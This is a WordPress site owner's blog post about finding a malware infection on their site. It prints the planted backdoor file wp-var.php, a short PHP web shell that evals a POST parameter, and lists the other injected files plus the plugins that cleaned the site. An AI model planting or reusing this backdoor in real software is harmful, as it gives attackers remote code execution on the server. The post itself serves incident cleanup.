Received this warning in Google Chrome last night when i tried to open my website jogindernagar.com built in WordPress.
Warning: Something's Not Right Here!
www.jogindernagar.com contains malware. Your computer might catch a virus if you visit this site.
I immidiately tried some anti-virus and security plugins and found a reference to some non-familiar files on my server. (I stil wonder how were these files placed on my server.). The scan results showed reference to a non familiar file named wp-includes/wp-var.php. The php file ran an eval() script as shown below:
<?php
if (isset($_POST['wp-load'])) {
eval($_POST['wp-load']);
};
?>I visited Google Webmaster Tool for more information and found 4 references to URL with malware. Here’s one:
http://www.jogindernagar.com/wp-count.php?ref=http%3A%2F%2Fwww.google.com%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3Dhistory%252Bdistrict %252Bjogindernagar%252Bhimachal%252Bpradesh%26source%3Dweb%26cd%3D4%26ved%3D0CCQQFjAA%26url %3Dhttp%253A%252F%252Fwww.jogindernagar.com%252Ffeatured%252F%26ei%3Dp49QUPDJB-LX2wSktAE%26usg%3DAFQjCNFucH2b1qTgMGKeK0oO0PD8DF_nAA
Obviously, the wp-count.php was another php file created to support the malware. I did another manual comparison on WordPress files and found more non-wordpress files having eval() and un-friendly php code in them.
I thought this information may be helpful for someone trying to remove the similar malware infection and code injection breaches.
Complete list of malware files found on my server:
wp-includes/wp-var.php
wp-count.php
wp-apps.php
wp-register.php
Some helpful Security, Antivirus and Scanning plugins for WordPress:
Wordfence Security (it fixed all my issues)
Better WP Security
WP Security Scan
AntiVirus
I am submitting a review request to Google right now. Let’s hope everything is fine now.
